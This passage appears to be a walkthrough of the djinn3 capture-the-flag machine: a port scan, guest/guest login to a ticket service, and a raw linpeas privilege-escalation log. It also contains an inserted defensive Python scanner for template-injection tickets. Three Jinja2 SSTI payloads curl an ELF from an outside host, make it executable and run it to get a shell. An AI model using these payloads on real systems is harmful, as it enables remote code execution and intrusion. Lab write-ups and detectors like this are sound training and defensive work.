PORT STATE SERVICE
22/tcp open ssh
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open http
|_http-title: Custom-ers
5000/tcp open upnp
31337/tcp open Elite
Then chain port 5000 with port 31337: the weak credentials guest/guest get you into the ticket service, and SSTI through the os._wrap_close class gives a callback.
{{().__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['__builtins__']['eval']("__import__('os').system('curl http://192.168.49.136/x.elf -o /tmp/x.elf')")}}
open
Title: 14
Description: {{().__class__.__bases__[0].__subclasses__()[118].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('chmod 777 /tmp/x.elf').read()")}}
open
Title: 15
Description: {{().__class__.__bases__[0].__subclasses__()[118].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('/tmp/x.elf').read()")}}
Then visit port 5000 to trigger the rendering, and the callback comes in.
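As a defender-side check added here (not code from the write-up or the djinn3 box): a stdlib-only scanner that flags ticket descriptions carrying the gadget chain shown above, normalising the bracket and `|attr()` spellings, run over constructed sample tickets; the actual fix is to hand the description to the template as a variable instead of rendering it as template source.

```python
import re
from dataclasses import dataclass, field

# A Jinja2 expression or statement block. The ticket "Description" field from
# the 31337 service lands inside one of these when the port-5000 app renders
# the ticket text as template source instead of passing it as a variable.
_TEMPLATE_BLOCK = re.compile(r"\{\{(.*?)\}\}|\{%(.*?)%\}", re.S)

# Equivalent spellings of an attribute access that evade naive ".__class__"
# matching: obj["__class__"], obj['__class__'] and obj|attr("__class__").
_BRACKET_ATTR = re.compile(r"""\[\s*(['"])(\w+)\1\s*\]""")
_FILTER_ATTR = re.compile(r"""\|\s*attr\(\s*(['"])(\w+)\1\s*\)""")
_IDENT = re.compile(r"[A-Za-z_]\w*")

# Names used to walk from an empty tuple up to the interpreter's builtins,
# and names that turn that walk into code execution.
WALK_GADGETS = {"__class__", "__bases__", "__mro__", "__subclasses__",
                "__init__", "__globals__", "__builtins__"}
EXEC_GADGETS = {"__import__", "eval", "exec", "popen", "system"}
RANK = {"info": 0, "suspicious": 1, "critical": 2}


@dataclass
class Finding:
    block: str                                  # raw "{{ ... }}" text
    walk: list = field(default_factory=list)    # object-walk gadgets seen
    exec_: list = field(default_factory=list)   # code-exec gadgets seen

    @property
    def severity(self):
        if self.walk and self.exec_:
            return "critical"      # walk reaches a code-execution sink
        if self.walk or self.exec_:
            return "suspicious"
        return "info"              # a template block, but no gadget names


def normalize(expr):
    """Rewrite bracket and attr() forms into plain dotted attribute access."""
    expr = _BRACKET_ATTR.sub(r".\2", expr)
    return _FILTER_ATTR.sub(r".\2", expr)


def detect_ssti(text):
    """Return one Finding per template block in text (empty list if none)."""
    findings = []
    for m in _TEMPLATE_BLOCK.finditer(text):
        inner = normalize(m.group(1) or m.group(2) or "")
        # identifiers in first-appearance order; string literals are scanned
        # too, because the exec step is usually a string handed to eval()
        idents = list(dict.fromkeys(_IDENT.findall(inner)))
        findings.append(Finding(
            block=m.group(0),
            walk=[n for n in idents if n in WALK_GADGETS],
            exec_=[n for n in idents if n in EXEC_GADGETS],
        ))
    return findings


def scan_tickets(tickets):
    """Map ticket id -> worst severity for tickets containing a template block."""
    report = {}
    for ticket in tickets:
        findings = detect_ssti(ticket["description"])
        if findings:
            worst = max(findings, key=lambda f: RANK[f.severity])
            report[ticket["id"]] = worst.severity
    return report


# Constructed sample tickets (not real captures). Ticket 15 mirrors the
# page's payload with the download host replaced by a placeholder.
SAMPLE_TICKETS = [
    {"id": 13, "description": "Printer on floor 3 keeps jamming."},
    {"id": 14, "description": "{{ user.name }} should appear in the greeting."},
    {"id": 15, "description":
        "{{().__class__.__bases__[0].__subclasses__()[128].__init__.__globals__"
        "['__builtins__']['eval'](\"__import__('os').system("
        "'curl http://ATTACKER_HOST/x.elf -o /tmp/x.elf')\")}}"},
    {"id": 16, "description": '{{ ()|attr("__class__")|attr("__bases__") }}'},
]

if __name__ == "__main__":
    for tid, severity in scan_tickets(SAMPLE_TICKETS).items():
        print(f"ticket {tid}: {severity}")
```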
./linpeas.sh
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: <https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist>
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═════════════════════════════════════════╣ Basic information ╠═════════════════════════════════════════
╚═══════════════════╝
OS: Linux version 4.15.0-101-generic (buildd@lgw01-amd64-003) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #102-Ubuntu SMP Mon May 11 10:07:26 UTC 2020
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: djinn3
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
╔════════════════════╗
════════════════════════════════════════╣ System Information ╠════════════════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits>
Linux version 4.15.0-101-generic (buildd@lgw01-amd64-003) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #102-Ubuntu SMP Mon May 11 10:07:26 UTC 2020
Distributor ID: Ubuntu
Description: Ubuntu 18.04.4 LTS
Release: 18.04
Codename: bionic
╔══════════╣ Sudo version
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version>
Sudo version 1.8.21p2
Vulnerable to CVE-2021-4034 (polkit privesc)
╔══════════╣ PATH
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses>
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Date & uptime
Thu Apr 21 15:42:25 IST 2022
15:42:25 up 1:11, 0 users, load average: 0.61, 0.16, 0.05
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
sed: -e expression #1, char 379: unknown option to `s'
╔══════════╣ Environment
╚ Any private information inside environment variables?
HISTFILESIZE=0
OLDPWD=/opt/.web
HISTSIZE=0
PWD=/tmp
HISTFILE=/dev/null
╔══════════╣ Searching Signature verification failed in dmesg
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed>
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ <https://github.com/mzet-/linux-exploit-suggester>
sed: -e expression #1, char 27: unknown option to `s'
╔══════════╣ Executing Linux Exploit Suggester 2
╚ <https://github.com/jondonas/linux-exploit-suggester-2>
╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)
╔═══════════╗
═════════════════════════════════════════════╣ Container ╠═════════════════════════════════════════════
╚═══════════╝
╔══════════╣ Container related tools present
/usr/bin/lxc
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No
╔════════════════════════════════════════════════╗
══════════════════════════╣ Processes, Crons, Timers, Services and Sockets ╠══════════════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: <https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes>
root 1 0.0 0.8 77664 8840 ? Ss 14:30 0:01 /sbin/init
root 486 0.0 1.4 94868 14528 ? S<s 14:31 0:00 /lib/systemd/systemd-journald
root 496 0.0 0.1 97708 1728 ? Ss 14:31 0:00 /sbin/lvmetad -f
root 509 0.0 0.6 47504 6464 ? Ss 14:31 0:00 /lib/systemd/systemd-udevd
systemd+ 540 0.0 0.3 141936 3248 ? Ssl 14:31 0:00 /lib/systemd/systemd-timesyncd
└─(Caps) 0x0000000002000000=cap_sys_time
systemd+ 585 0.0 0.5 70640 5056 ? Ss 14:31 0:00 /lib/systemd/systemd-resolved
root 605 0.0 0.9 91156 9900 ? Ss 14:31 0:00 /usr/bin/VGAuthService
root 606 0.0 0.7 227048 7544 ? S<sl 14:31 0:03 /usr/bin/vmtoolsd
root 607 0.0 0.1 604824 1820 ? Ssl 14:31 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
root 608 0.0 0.3 31320 3196 ? Ss 14:31 0:00 /usr/sbin/cron -f
root 1778 0.0 0.3 58792 3284 ? S 15:36 0:00 _ /usr/sbin/CRON -f
saint 1779 0.0 0.0 4628 852 ? Ss 15:36 0:00 | _ /bin/sh -c /usr/bin/python3 /home/saint/.sync-data/syncer.py
saint 1780 0.0 2.7 87180 27684 ? S 15:36 0:00 | _ /usr/bin/python3 /home/saint/.sync-data/syncer.py
root 1813 0.0 0.3 58792 3284 ? S 15:39 0:00 _ /usr/sbin/CRON -f
saint 1814 0.0 0.0 4628 856 ? Ss 15:39 0:00 | _ /bin/sh -c /usr/bin/python3 /home/saint/.sync-data/syncer.py
saint 1815 0.0 2.7 87180 27748 ? S 15:39 0:00 | _ /usr/bin/python3 /home/saint/.sync-data/syncer.py
root 1946 0.0 0.3 58792 3284 ? S 15:42 0:00 _ /usr/sbin/CRON -f
saint 1947 0.0 0.0 4628 812 ? Ss 15:42 0:00 _ /bin/sh -c /usr/bin/python3 /home/saint/.sync-data/syncer.py
saint 1948 0.8 2.7 87180 27568 ? S 15:42 0:00 _ /usr/bin/python3 /home/saint/.sync-data/syncer.py
www-data 612 0.0 2.7 309676 27856 ? Ssl 14:31 0:01 /usr/bin/python3 webapp.py
www-data 1828 0.0 0.0 4628 848 ? S 15:41 0:00 _ /bin/sh -c /tmp/x.elf
www-data 1829 0.0 0.0 4628 876 ? S 15:41 0:00 _ //bin/sh
www-data 1831 0.0 0.2 5484 2688 ? S 15:41 0:00 _ /bin/sh ./linpeas.sh
www-data 4925 0.0 0.0 5484 952 ? S 15:42 0:00 _ /bin/sh ./linpeas.sh
www-data 4929 0.0 0.3 36840 3324 ? R 15:42 0:00 | _ ps fauxwww
www-data 4928 0.0 0.0 5484 952 ? S 15:42 0:00 _ /bin/sh ./linpeas.sh
message+ 613 0.0 0.4 50044 4376 ? Ss 14:31 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
└─(Caps) 0x0000000020000000=cap_audit_write
syslog 620 0.0 0.4 267272 5044 ? Ssl 14:31 0:00 /usr/sbin/rsyslogd -n
root 621 0.0 0.6 287548 6976 ? Ssl 14:31 0:00 /usr/lib/accountsservice/accounts-daemon
root 622 0.0 0.5 62144 5736 ? Ss 14:31 0:00 /lib/systemd/systemd-logind
daemon 624 0.0 0.2 28332 2508 ? Ss 14:31 0:00 /usr/sbin/atd -f
root 626 0.0 1.7 170396 17164 ? Ssl 14:31 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 636 0.0 2.0 187244 20196 ? Ssl 14:31 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root 671 0.0 0.6 288884 6600 ? Ssl 14:31 0:00 /usr/lib/policykit-1/polkitd --no-debug
www-data 672 0.0 0.4 55696 4944 ? Ss 14:31 0:01 /usr/sbin/lighttpd -D -f /etc/lighttpd/lighttpd.conf
root 898 0.0 0.5 72300 5756 ? Ss 14:33 0:00 /usr/sbin/sshd -D
root 941 0.0 0.1 16180 1976 tty1 Ss+ 14:33 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
root 948 0.0 0.2 24188 2612 ? Ss 14:33 0:00 /usr/sbin/xinetd -pidfile /run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6
www-data 1527 0.0 0.3 21340 3596 ? Ss 14:50 0:00 _ /bin/bash /opt/.tick-serv/tickets.sh
www-data 1528 0.0 1.2 48068 13092 ? S 14:50 0:00 _ python3 /opt/.tick-serv/tickets.py
systemd+ 1175 0.0 0.5 71864 5468 ? Ss 14:33 0:00 /lib/systemd/systemd-networkd
└─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes>
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND PID TID USER FD TYPE DEVICE SIZE/OFF NODE NAME
╔══════════╣ Processes with credentials in memory (root req)
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory>
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd Not Found
╔══════════╣ Cron jobs
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs>
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 6 Jun 1 2020 /etc/cron.allow
-rw-r--r-- 1 root root 722 Nov 16 2017 /etc/crontab
/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 May 6 2020 .
drwxr-xr-x 94 root root 4096 Sep 30 2020 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rw-r--r-- 1 root root 589 Mar 7 2018 mdadm
-rw-r--r-- 1 root root 191 May 6 2020 popularity-contest
/etc/cron.daily:
total 64
drwxr-xr-x 2 root root 4096 Jun 1 2020 .
drwxr-xr-x 94 root root 4096 Sep 30 2020 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 376 Nov 20 2017 apport
-rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1176 Nov 3 2017 dpkg
-rwxr-xr-x 1 root root 338 Jan 19 2017 lighttpd
-rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate
-rwxr-xr-x 1 root root 1065 Apr 7 2018 man-db
-rwxr-xr-x 1 root root 539 Mar 7 2018 mdadm
-rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate
-rwxr-xr-x 1 root root 249 Jan 25 2018 passwd
-rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest
-rwxr-xr-x 1 root root 246 Mar 21 2018 ubuntu-advantage-tools
-rwxr-xr-x 1 root root 214 Jul 12 2013 update-notifier-common
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 May 5 2020 .
drwxr-xr-x 94 root root 4096 Sep 30 2020 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 May 5 2020 .
drwxr-xr-x 94 root root 4096 Sep 30 2020 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 May 6 2020 .
drwxr-xr-x 94 root root 4096 Sep 30 2020 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 723 Apr 7 2018 man-db
-rwxr-xr-x 1 root root 211 Jul 12 2013 update-notifier-common
saint
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
╔══════════╣ Systemd PATH
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths>
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
╔══════════╣ Analyzing .service files
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#services>
You can't write on systemd PATH
╔══════════╣ System timers
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers>
NEXT LEFT LAST PASSED UNIT ACTIVATES
Thu 2022-04-21 23:24:28 IST 7h left Thu 2022-04-21 14:33:30 IST 1h 8min ago apt-daily.timer apt-daily.service
Fri 2022-04-22 06:45:59 IST 15h left Thu 2022-04-21 14:33:31 IST 1h 8min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Fri 2022-04-22 10:02:51 IST 18h left Thu 2022-04-21 14:33:26 IST 1h 9min ago motd-news.timer motd-news.service
Fri 2022-04-22 14:46:19 IST 23h left Thu 2022-04-21 14:46:19 IST 56min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2022-04-25 00:00:00 IST 3 days left Thu 2022-04-21 14:33:26 IST 1h 9min ago fstrim.timer fstrim.service
n/a n/a n/a n/a snapd.snap-repair.timer snapd.snap-repair.service
n/a n/a n/a n/a ureadahead-stop.timer ureadahead-stop.service
╔══════════╣ Analyzing .timer files
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers>
╔══════════╣ Analyzing .socket files
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets>
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request
╔══════════╣ Unix Sockets Listening
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets>
/run/acpid.socket
└─(Read Write)
/run/dbus/system_bus_socket
└─(Read Write)
/run/lvm/lvmetad.socket
/run/lvm/lvmpolld.socket
/run/snapd-snap.socket
└─(Read Write)
/run/snapd.socket
└─(Read Write)
/run/systemd/fsck.progress
/run/systemd/journal/dev-log
└─(Read Write)
/run/systemd/journal/socket
└─(Read Write)
/run/systemd/journal/stdout
└─(Read Write)
/run/systemd/journal/syslog
└─(Read Write)
/run/systemd/notify
└─(Read Write)
/run/systemd/private
└─(Read Write)
/run/udev/control
/run/uuidd/request
└─(Read Write)
/run/vmware/guestServicePipe
└─(Read Write)
/var/lib/lxd/unix.socket
/var/run/dbus/system_bus_socket
└─(Read Write)
/var/run/vmware/guestServicePipe
└─(Read Write)
╔══════════╣ D-Bus config files
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus>
Possible weak user policy found on /etc/dbus-1/system.d/dnsmasq.conf ( <policy user="dnsmasq">)
╔══════════╣ D-Bus Service Objects list
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus>
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 585 systemd-resolve systemd-resolve :1.0 systemd-resolved.service - -
:1.2 1 systemd root :1.2 init.scope - -
:1.21 7716 busctl www-data :1.21 web.service - -
:1.3 622 systemd-logind root :1.3 systemd-logind.service - -
:1.4 621 accounts-daemon root :1.4 accounts-daemon.service - -
:1.5 671 polkitd root :1.5 polkit.service - -
:1.6 636 unattended-upgr root :1.6 unattended-upgrades.se…ce - -
:1.7 626 networkd-dispat root :1.7 networkd-dispatcher.se…ce - -
:1.9 1175 systemd-network systemd-network :1.9 systemd-networkd.service - -
com.ubuntu.LanguageSelector - - - (activatable) - -
com.ubuntu.SoftwareProperties - - - (activatable) - -
io.netplan.Netplan - - - (activatable) - -
org.freedesktop.Accounts 621 accounts-daemon root :1.4 accounts-daemon.service - -
org.freedesktop.DBus 1 systemd root - init.scope - -
org.freedesktop.PolicyKit1 671 polkitd root :1.5 polkit.service - -
org.freedesktop.hostname1 - - - (activatable) - -
org.freedesktop.locale1 - - - (activatable) - -
org.freedesktop.login1 622 systemd-logind root :1.3 systemd-logind.service - -
org.freedesktop.network1 1175 systemd-network systemd-network :1.9 systemd-networkd.service - -
org.freedesktop.resolve1 585 systemd-resolve systemd-resolve :1.0 systemd-resolved.service - -
org.freedesktop.systemd1 1 systemd root :1.2 init.scope - -
org.freedesktop.timedate1 - - - (activatable) - -
╔═════════════════════╗
════════════════════════════════════════╣ Network Information ╠════════════════════════════════════════
╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
djinn3
127.0.0.1 localhost
127.0.1.1 beginnen
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 127.0.0.53
options edns0
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.136.102 netmask 255.255.255.0 broadcast 192.168.136.255
ether 00:50:56:ba:26:ff txqueuelen 1000 (Ethernet)
RX packets 21032 bytes 4631479 (4.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 17598 bytes 6834221 (6.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 726 bytes 58491 (58.4 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 726 bytes 58491 (58.4 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
╔══════════╣ Active Ports
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports>
tcp 0 0 0.0.0.0:5000 0.0.0.0:* LISTEN 612/python3
tcp 0 0 0.0.0.0:31337 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
╔══════════╣ Can I sniff with tcpdump?
No
╔═══════════════════╗
═════════════════════════════════════════╣ Users Information ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#users>
uid=33(www-data) gid=33(www-data) groups=33(www-data)
╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid>
╔══════════╣ Checking sudo tokens
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens>
ptrace protection is enabled (1)
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it
╔══════════╣ Checking Pkexec policy
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2>
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
jack:x:1001:1003:,,,:/home/jack:/bin/bash
mzfr:x:1002:1004:,,,:/home/mzfr:/bin/bash
root:x:0:0:root:/root:/bin/bash
saint:x:1000:1002:,,,:/home/saint:/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=1000(saint) gid=1002(saint) groups=1002(saint)
uid=1001(jack) gid=1003(jack) groups=1003(jack)
uid=1002(mzfr) gid=1004(mzfr) groups=1004(mzfr)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=110(uuidd) groups=110(uuidd)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(landscape) gid=112(landscape) groups=112(landscape)
uid=109(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=110(pollinate) gid=1(daemon) groups=1(daemon)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
╔══════════╣ Login now
15:42:31 up 1:11, 0 users, load average: 0.56, 0.16, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
╔══════════╣ Last logons
reboot system boot Tue Feb 15 17:22:50 2022 still running 0.0.0.0
wtmp begins Tue Feb 15 17:22:50 2022
╔══════════╣ Last time logon each user
Username Port From Latest
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
╔══════════════════════╗
═══════════════════════════════════════╣ Software Information ╠═══════════════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/lxc
/usr/bin/make
/bin/nc
/bin/netcat
/usr/bin/perl
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.6
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
ii g++ 4:7.4.0-1ubuntu2.3 amd64 GNU C++ compiler
ii g++-7 7.5.0-3ubuntu1~18.04 amd64 GNU C++ compiler
ii gcc 4:7.4.0-1ubuntu2.3 amd64 GNU C compiler
ii gcc-7 7.5.0-3ubuntu1~18.04 amd64 GNU C compiler
/usr/bin/gcc
╔══════════╣ Searching mysql credentials and exec
╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Feb 14 2020 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 May 16 2020 /etc/ldap
╔══════════╣ Searching ssl/ssh files
find: './netplan_uktfyc44': Permission denied
find: './systemd-private-a105b93e763444829709527c62b38db6-systemd-resolved.service-XxzxH4': Permission denied
find: './vmware-root_606-2722828934': Permission denied
find: './netplan_95emtdac': Permission denied
find: './systemd-private-a105b93e763444829709527c62b38db6-systemd-timesyncd.service-BHH9q6': Permission denied
ChallengeResponseAuthentication no
UsePAM yes
══╣ Some certificates were found (out limited):
/etc/pollinate/entropy.ubuntu.com.pem
gpg-connect-agent: no running gpg-agent - starting '/usr/bin/gpg-agent'
gpg-connect-agent: failed to create temporary file '/var/www/.gnupg/.#lk0x000056366d2132f0.djinn3.8184': No such file or directory
gpg-connect-agent: can't connect to the agent: No such file or directory
gpg-connect-agent: error sending standard options: No agent running
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow
Searching inside /etc/ssh/ssh_config for interesting info
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Jun 1 2020 /etc/pam.d
-rw-r--r-- 1 root root 2133 Feb 10 2018 /etc/pam.d/sshd
╔══════════╣ Searching tmux sessions
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions>
tmux 2.6
/tmp/tmux-33
╔══════════╣ Analyzing Keyring Files (limit 70)
